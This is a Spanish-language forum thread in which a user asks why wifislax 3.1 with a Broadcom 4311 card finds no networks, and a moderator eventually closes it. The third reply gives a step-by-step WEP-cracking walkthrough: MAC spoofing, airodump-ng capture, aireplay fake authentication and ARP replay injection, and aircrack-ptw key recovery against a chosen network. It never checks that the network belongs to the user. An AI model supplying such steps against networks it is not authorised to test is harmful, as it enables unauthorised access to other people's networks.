Foros del Web » Administración de Sistemas » Seguridad y redes »

Problema en wifislax con broadcom 4311

Estas en el tema de Problema en wifislax con broadcom 4311 en el foro de Seguridad y redes en Foros del Web. que tal amigos buenas, estoy comenzando con eso de las auditorias con wifislax 3.1 tengo una compaq presario v3417la y una tarjeta inalambrica broadcom 4311, ...
  #1 (permalink)  
Antiguo 22/12/2009, 18:25
 
Fecha de Ingreso: mayo-2009
Mensajes: 242
Antigüedad: 15 años
Puntos: 2
Pregunta Problema en wifislax con broadcom 4311

que tal amigos buenas, estoy comenzando con eso de las auditorias con wifislax 3.1 tengo una compaq presario v3417la y una tarjeta inalambrica broadcom 4311, el problema que tengo esque me dice que todo esta bien si reconoce mi tarjeta pero al momento de escanear no detecta nada de hecho ni mi red, entonces quiciera que me ayudaran porfavor de antemano gracias.
  #2 (permalink)  
Antiguo 29/12/2009, 16:35
Aus
 
Fecha de Ingreso: diciembre-2009
Mensajes: 61
Antigüedad: 14 años, 4 meses
Puntos: 1
Respuesta: Problema en wifislax con broadcom 4311

Esta maquina utiliza algun tipo de boton(fisico) para "conectar/desconectar" la tarjeta?.

He visto maquinas en las que existe un boton que "conecta/desconecta" la antena de la tarjeta wifi(no la tarjeta, solo la antena). Esto hace que el sistema reconozca que la tarjeta funciona correctamente, la detecta y carga los drivers. El problema es que no tiene antena, lo que significa que su radio de cobertura es nulo^nada.

Te puedo decir que he tenido este mismo problema en un fujitsu, la opcion fue googlear un poco para ver como activar la antena de mi tarjeta.
  #3 (permalink)  
Antiguo 01/12/2010, 23:48
 
Fecha de Ingreso: diciembre-2010
Mensajes: 1
Antigüedad: 13 años, 5 meses
Puntos: 0
Respuesta: Problema en wifislax con broadcom 4311

tnes 2 opciones prueba primero con el kwifimanager si no t funciona prueba sto

1.cargar drivers de inyeccion broadcom:menu >wifislax>asistencia chipset,chipset broadcom
cargar divers de inyeccion speras a q finalice la tarea hasta q en console diga finished lo cierras y vuelves a hacer lo mismo y esperas otra vz

2.ifconfig interfaz down

3.macchanger -m 00:22:33:44:55 interfaz

4.iwconfig interfaz rate 1M

5.airodump-ng interfaz

6.aparecen las redes escogemos la que queremos atacar y pulsamos control + c para
parar el airodump

7.ponemos el airodump en el canal que escogimos> airodump-ng -w captura -c 6 interfaz

8.cuando ya tenemos el objetivo fijado abrimos otra terminal y metemos el siguinete comando.
aireplay-broadcom-ng -1 0 -e (essid escogida) -a (bssid escogida) -h 00:11:22:33:44:55 interfaz

9.les va a decir sendig autenticacion request y cunado diga associaton successful van
a meter el siguiente comando en esa misma terminal.nota muy importante para que asocie
en la ventana donde tienen el airodump tienen que tener en rxq mas de 90 si es
posible que sea 100 si no va a ser dificil asociar


10.aireplay-broadcom-ng -3 -b (mac del cliente) -h 00:11:22:33:44:55 interfaz
veremos una linea como esta read 14400 packets (got 500 arp request) sent 5500 packets
y en el airodump veremos subir los datas cuando lleguen a 50000 ya podemos lanzar
el ataque en otra terminal


aircrack-ptw captura-01.cap


Nota: captura qiere decir el nombre q le dist anteriorment en el paso num 7

en el paso 8 fijat bn en uno dice bssid y el otro essid dond bssid es la direccion mac y essid es el nombre de la red la mac son todos los numeros como la q cambiamos en el paso 3 esta t aparece en la primera columna cuando ia detectast las redes


espero q t sirva Suert
  #4 (permalink)  
Antiguo 02/12/2010, 12:07
Avatar de BrujoNic
Super Moderador
 
Fecha de Ingreso: noviembre-2001
Ubicación: Costa Rica/Nicaragua
Mensajes: 16.935
Antigüedad: 22 años, 5 meses
Puntos: 655
Respuesta: Problema en wifislax con broadcom 4311

Cerrado...

No se permite revivir temas viejos.
__________________
La tecnología está para ayudarnos. No comprendo el porqué con esa ayuda, la gente escribe TAN MAL.
NO PERDAMOS NUESTRO LINDO IDIOMA ESPAÑOL
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Tema Cerrado




La zona horaria es GMT -6. Ahora son las 13:24.